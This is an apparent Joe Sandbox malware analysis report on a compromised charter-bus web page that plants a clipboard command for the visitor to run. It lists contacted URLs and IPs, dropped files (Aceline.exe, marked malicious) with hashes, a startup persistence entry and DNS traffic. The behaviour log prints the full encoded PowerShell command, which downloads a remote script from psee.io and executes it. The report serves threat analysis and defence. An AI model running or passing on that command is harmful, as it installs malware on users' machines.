https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chromesuggestions	chrome.exe, 0000000E.00000002.2061764648.0000119001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2096055959.0000146001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2148449499.00004C5801994000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nonexistent.googlezip.net/	chrome.exe, 0000000E.00000003.2037264301.0000119001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2055268140.0000119001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2053209181.0000146001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2088885306.00004C5801040000.00000004.00000800.00020000.00000000.sdmp	false		high
https://googleusercontent.comb	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bitly.cx	powershell.exe, 00000009.00000002.1749078220.00000000052A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay	chrome.exe, 0000000E.00000002.2052865239.000011900060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2074491157.0000146000610000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120252056.00004C5800610000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/yraPuhAK	Aceline.exe, 0000000D.00000002.2112993095.0000026B2D1B1000.00000004.00000001.00020000.00000000.sdmp	false		high
https://tunnel-staging.googlezip.net/2	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1750643154.000000000604C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Y1	chrome.exe, 00000011.00000003.2127746299.00004C58012A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_M1_CrossAppWebAra_1_Stable_20230926_A	chrome.exe, 0000000E.00000002.2057335305.00001190012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2087486697.00001460012FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://psee.io	powershell.exe, 00000009.00000002.1749078220.0000000005144000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Control_Consent_AllAPIs_Old_limited_Stable_20230807	chrome.exe, 0000000E.00000002.2057625057.00001190013A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2087814030.00001460013A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/2	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nonexistent.googlezip.net/b	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Z&	chrome.exe, 0000000E.00000002.2056322361.00001190011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2086387899.00001460011B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/	chrome.exe, 00000011.00000003.2128822420.00004C580130C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129065346.00004C5801314000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 00000011.00000003.2128822420.00004C580130C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129065346.00004C5801314000.00000004.00000800.00020000.00000000.sdmp	false		high
https://psee.io/7m2yhx(:	powershell.exe, 00000009.00000002.1749078220.0000000005144000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/upload	chrome.exe, 00000011.00000002.2146004278.00004C5801508000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.privacysandbox.comb	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chromesuggestionsEnabled	chrome.exe, 0000000E.00000002.2061764648.0000119001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2096055959.0000146001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2148449499.00004C5801994000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/LX	chrome.exe, 00000011.00000003.2129998035.00004C580134C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129557092.00004C5801344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129153008.00004C5801324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129447739.00004C5801334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129725325.00004C5801348000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129065346.00004C5801314000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/coacEnableFullscreenAppListEnablePlayStoreAppSearchEnableFullscreenAppListEna	chrome.exe, 0000000E.00000002.2062483604.0000119001A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2098265781.0000146001A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2148996080.00004C5801A70000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/upload2	chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 0000000E.00000002.2056322361.00001190011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2057131461.0000119001278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2087274773.0000146001278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2086387899.00001460011B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=blocked	chrome.exe, 0000000E.00000002.2054231637.0000119000F18000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.43.51.48	unknown	United States	35994	AKAMAI-ASUS	false
75.2.108.141	epsilon.6sense.com	United States	16509	AMAZON-02US	false
34.239.236.43	psee.io	United States	14618	AMAZON-AESUS	false
23.43.51.47	e212585.b.akamaiedge.net	United States	35994	AKAMAI-ASUS	false
172.67.146.180	browngreencolors.top	United States	13335	CLOUDFLARENETUS	false
142.250.101.156	stats.g.doubleclick.net	United States	15169	GOOGLEUS	false
18.188.153.65	gogocharters.com	United States	16509	AMAZON-02US	false
70.40.216.191	ia-robotics.com	United States	46606	UNIFIEDLAYER-AS-1US	false
104.254.148.252	unknown	United States	29990	ASN-APPNEXUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
142.251.2.154	googleads.g.doubleclick.net	United States	15169	GOOGLEUS	false
142.250.101.105	www.google.com	United States	15169	GOOGLEUS	false
50.57.243.90	clients.contology.com	United States	32244	LIQUIDWEBUS	false
104.254.151.60	ib.anycast.adnxs.com	United States	29990	ASN-APPNEXUS	false
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.16.1	septembergoodwine.top	United States	13335	CLOUDFLARENETUS	false
142.250.101.103	unknown	United States	15169	GOOGLEUS	false
144.172.101.228	unknown	United States	53667	PONYNETUS	true
54.175.154.40	myvocabulary.com	United States	14618	AMAZON-AESUS	true
216.239.32.181	analytics-alv.google.com	United States	15169	GOOGLEUS	false
142.251.2.93	youtube-ui.l.google.com	United States	15169	GOOGLEUS	false
150.171.27.10	ax-0001.ax-msedge.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
74.125.137.104	unknown	United States	15169	GOOGLEUS	false
104.21.95.172	unknown	United States	13335	CLOUDFLARENETUS	false
99.83.231.3	unknown	United States	16509	AMAZON-02US	false
142.250.141.94	beacons-handoff.gcp.gvt2.com	United States	15169	GOOGLEUS	false
104.21.91.178	bitly.cx	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1696266
Start date and time:	2025-05-21 21:46:53 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://gogocharters.com/lexington-charter-bus
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.win@50/221@78/29
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Successful, ratio: 69% Number of executed functions: 86 Number of non-executed functions: 3

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.250.101.113, 142.250.101.139, 142.250.101.138, 142.250.101.100, 142.250.101.101, 142.250.101.102, 74.125.137.84, 142.250.141.138, 142.250.141.100, 142.250.141.139, 142.250.141.102, 142.250.141.113, 142.250.141.101, 142.251.2.138, 142.251.2.102, 142.251.2.113, 142.251.2.101, 142.251.2.139, 142.251.2.100, 142.250.101.97, 74.125.137.94, 142.251.2.94, 23.66.134.242
Excluded domains from analysis (whitelisted): ev2-ring.msedge.net, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, bat.bing.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, c.pki.goog, www.google-analytics.com
Execution Graph export aborted for target Aceline.exe, PID 4216 because there are no executed function
Execution Graph export aborted for target chrome.exe, PID 7448 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://gogocharters.com/lexington-charter-bus

Simulations

Behavior and APIs

Time	Type	Description
15:48:19	API Interceptor	44x Sleep call for process: powershell.exe modified
15:48:40	API Interceptor	489x Sleep call for process: Aceline.exe modified
21:48:18	Clipboard	Run: powershell /ep bypass /e JABiAD0AKABOAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABzACcAKwAnAGUAZQAuAGkAbwAvADcAbQAnACsAJwAyAHkAaAB4ACcAKQA7AGkAZQBYACAAJABiADsA /W 1
21:48:44	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Aceline.url

Process:	C:\Users\user\AppData\Local\Temp\Aceline.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5946776
Entropy (8bit):	6.838482833956945
Encrypted:	false
SSDEEP:	98304:Kii0LgHXMBBBBB2UWUznpXqQCvZ4AIKrw68OUAJUdrQOs8OWN3zBkTVjgkb/kOUV:ziSg3MBBBBB2UWUznpXqlvZ4AIKrw68V
MD5:	FFD09F92A5477A88E376970A0348DDD6
SHA1:	2AC9EDCA1B6505EEA8686D0206BF37A266D9BF65
SHA-256:	82767F8B2546A8C234EF212203452A24962EDEE5E8CCB936179499288340D016
SHA-512:	29E979A4CB73A8AD5FE881019AC5A40BC045CA5ED69F3EDBD0EA68603050615C617AC0C8E1E2CA3A2223FF091D0FE5B0A1994BC1E44587F1EB57CA9C306652E3
Malicious:	true
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.L..."..."..."......"..#..."..#!..."..#&..."..#'.0."..##..."...&..."...$..."...#..."...#.\|."..#+..."..#"..."..#..."......."..# ...".Rich..".................PE..d....V.g.........."....*.`/..2.................@..............................Z.....Y\Z...`..........................................kC.....tlC......PG.......E.d<...lZ..Q...0H.......;.......................;.(...p.;.@............p/.H............................text....^/......`/................. ..`.rdata...6...p/..8...d/.............@..@.data... T....C..D....C.............@....pdata..d<....E..>....D.............@..@.rsrc........PG.......G.............@..@.reloc...T...0H..T....G.............@..B................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Aceline.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.383282394444275
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1Bv:ML9E4KQ71qE4GIsD
MD5:	00930768B2E044245AC5529BC4F2FFDF
SHA1:	DF262F47F31653AAE570477B12B90B2E385A8D50
SHA-256:	E0A23AC0FD66AC2AD5922D20187B374A1B7B148FF47CABB69441EB2F699008C8
SHA-512:	76F371B3D2FCE707DA45DCA1755DE56BA7AC8827E5F18F900E52AEF35AEF3D42B39F656CC08A10372872BA601AFD9E6F3D930A98F92A3F9A885E9B6CBAF38ADA
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1704
Entropy (8bit):	5.465152489498165
Encrypted:	false
SSDEEP:	48:z1WSU4YymI4RIoUeW+mZ9tK8NWR8PSNRrsR908dym:z1LHYvIIfLmZ2KWEUIS8Em
MD5:	26A84DC381361FB9B7AE0658910A101F
SHA1:	D5FCD9A8F2765D6C24A5DF92C1C61628E95B2763
SHA-256:	86B26574F698305C86B179DE511C7BA20B6F65A18A12E0A959A00B77FAA8E476
SHA-512:	D1890D0BE2757E4580D7B02DDEB653FCEAB12A5D6CFA7D9E256864F0EC724E21B5598144C8D3D4FA6284CBB81B3333A45BB7EDFB95C76CF3739CC3AB338CA233
Malicious:	false
Reputation:	low
Preview:	@...e...........B.....................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 48836, version 1.0
Category:	downloaded
Size (bytes):	48836
Entropy (8bit):	7.996186499450183
Encrypted:	true
SSDEEP:	768:grGFVEQHLxxs0tiloCIajnhCUlzFeIN9NtEhLSwdZt+HZmiXH+ZbmFDsTswTMcHf:gQhjs0tim5axTC4M8giXHcbmF6DMcSQ5
MD5:	F3D89F2E11F1870A0C6F1CD7C1DA647A
SHA1:	4012D9E05C30F9B1524C8A614BF6864B6B819DF5
SHA-256:	ED92B61060D50EF6D9F2650FF187679814C0DBB5DF13CA789F6EB7FABADD9EFB
SHA-512:	149837660AB4E12F03DEDA0BE75B39ED5CD72DE27F31D4943C9997C13847BCFC4059F48829CFC14AB64A74277FD580FCCD26239600CAE576F180A677B1E2534C
Malicious:	false
Reputation:	low
URL:	https://gogocharters.com/fonts_new_design/Poppins/Poppins-Bold.woff2
Preview:	wOF2..............9....b........................?FFTM........Z.`..^.....H..<.....6.$..f. ..W..8[>...G.., ..P...>...U.2...9.G....5(U1X".>.w+..r........I.2.....&..pb..V......(9.e.s...'Us89K...UH..=..a.'..'...t<.tq..s>.Z...Bx......j=:...1#...r.-..?..\|<_Sa......HP%......W..u5R....S....s..o.88...A.D..88...7.7Zm..I..zg.\z.........G....[.5^.Z;i.WH..]B.....m.....V.`.C>.....M..[E.\|H.-.G.......QE.v.!08..C.~.H+.......{E..>7)Lu......`=.2.O._.R...FL^\....I.&5..(P........cc..)..c...4..w....$..DZ.d;.G.p.%J$RB)k..Jt..\|.m....K'...F....o(.{...}?.r.7.P..h.`,.M[.)w.t......Ks.cU...\#..... S@....Qq.O..Y..fSQ.K.^.uW....f.R........8..Yj..GH...............-...../r~z..@...j.......f..0.a.B.]....7..RJ)np.S4E.4ES4....(.E.h......[.EQ.E..0q.O$.7..k....K(...%.J[Zg..8..<..=}m.5..."......v.......?&.J.Dl...'j'....Ml>.".9....{./.....W..&g..6..eb.r&.L..Nz..l..."...n^)..R...(..i.....-..h..i...._..RJi.....1.....RJ)....EQ.E.4M.np..EQ.M.4M...9.%.9...i......._....*y..R4.~.v....O[....B.6..

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 21, 2025 21:47:52.085496902 CEST	53	61158	1.1.1.1	192.168.2.5
May 21, 2025 21:47:52.101053953 CEST	53	56273	1.1.1.1	192.168.2.5
May 21, 2025 21:47:52.942704916 CEST	53	64085	1.1.1.1	192.168.2.5
May 21, 2025 21:47:53.161551952 CEST	53	59072	1.1.1.1	192.168.2.5
May 21, 2025 21:47:56.215385914 CEST	53967	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:56.215385914 CEST	60211	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:56.370809078 CEST	53	60211	1.1.1.1	192.168.2.5
May 21, 2025 21:47:56.370865107 CEST	53	53967	1.1.1.1	192.168.2.5
May 21, 2025 21:47:57.467514038 CEST	58248	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:57.468159914 CEST	59274	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:57.487030029 CEST	61673	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:57.487171888 CEST	60781	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:57.652399063 CEST	53	61673	1.1.1.1	192.168.2.5
May 21, 2025 21:47:57.652766943 CEST	53	60781	1.1.1.1	192.168.2.5
May 21, 2025 21:47:57.652781963 CEST	53	58248	1.1.1.1	192.168.2.5
May 21, 2025 21:47:57.676295996 CEST	53	59274	1.1.1.1	192.168.2.5
May 21, 2025 21:47:58.969120979 CEST	57102	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:58.969371080 CEST	54889	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:59.071458101 CEST	53	51124	1.1.1.1	192.168.2.5
May 21, 2025 21:47:59.124867916 CEST	53	54889	1.1.1.1	192.168.2.5
May 21, 2025 21:47:59.132965088 CEST	53	57102	1.1.1.1	192.168.2.5
May 21, 2025 21:47:59.580925941 CEST	51451	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:59.581140041 CEST	62768	53	192.168.2.5	1.1.1.1
May 21, 2025 21:47:59.737368107 CEST	53	51451	1.1.1.1	192.168.2.5
May 21, 2025 21:47:59.737715960 CEST	53	62768	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.037714958 CEST	53703	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.037846088 CEST	53133	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.065181971 CEST	52117	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.065299988 CEST	62927	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.192573071 CEST	53	62890	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.193094015 CEST	53	53703	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.193680048 CEST	53	53133	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.259051085 CEST	53	62927	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.263526917 CEST	53	52117	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.285037041 CEST	57444	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.285324097 CEST	59736	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.445480108 CEST	53	57444	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.476273060 CEST	53	59736	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.522536993 CEST	53496	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.522680044 CEST	55446	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.523523092 CEST	61271	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.523643017 CEST	65054	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.523921967 CEST	56253	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.524024010 CEST	53861	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.674702883 CEST	50758	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.674932003 CEST	55671	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:01.677984953 CEST	53	53496	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.679286003 CEST	53	65054	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.679322958 CEST	53	55446	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.679794073 CEST	53	53861	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.680325031 CEST	53	56253	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.716274977 CEST	53	61271	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.832978964 CEST	53	55671	1.1.1.1	192.168.2.5
May 21, 2025 21:48:01.845761061 CEST	53	50758	1.1.1.1	192.168.2.5
May 21, 2025 21:48:02.490163088 CEST	53349	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:02.490339994 CEST	61628	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:02.645430088 CEST	53	53349	1.1.1.1	192.168.2.5
May 21, 2025 21:48:02.645762920 CEST	53	61628	1.1.1.1	192.168.2.5
May 21, 2025 21:48:02.748539925 CEST	58509	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:02.748723030 CEST	50425	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:02.826061964 CEST	54029	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:02.826356888 CEST	61835	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:02.905807018 CEST	53	58509	1.1.1.1	192.168.2.5
May 21, 2025 21:48:02.907860994 CEST	53	50425	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.021338940 CEST	53	50790	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.135468006 CEST	53	61835	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.140513897 CEST	53	54029	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.445338964 CEST	53953	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.445758104 CEST	52709	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.447392941 CEST	61516	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.447577000 CEST	64383	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.448523998 CEST	54305	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.448735952 CEST	62761	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.461565018 CEST	56875	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.461944103 CEST	63993	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.601445913 CEST	53	52709	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.602384090 CEST	53	53953	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.603679895 CEST	53	61516	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.604022980 CEST	53	62761	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.604094028 CEST	53	64383	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.605894089 CEST	53	54305	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.617628098 CEST	53	63993	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.619726896 CEST	53	56875	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.637675047 CEST	53	59920	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.686475039 CEST	61722	53	192.168.2.5	1.1.1.1
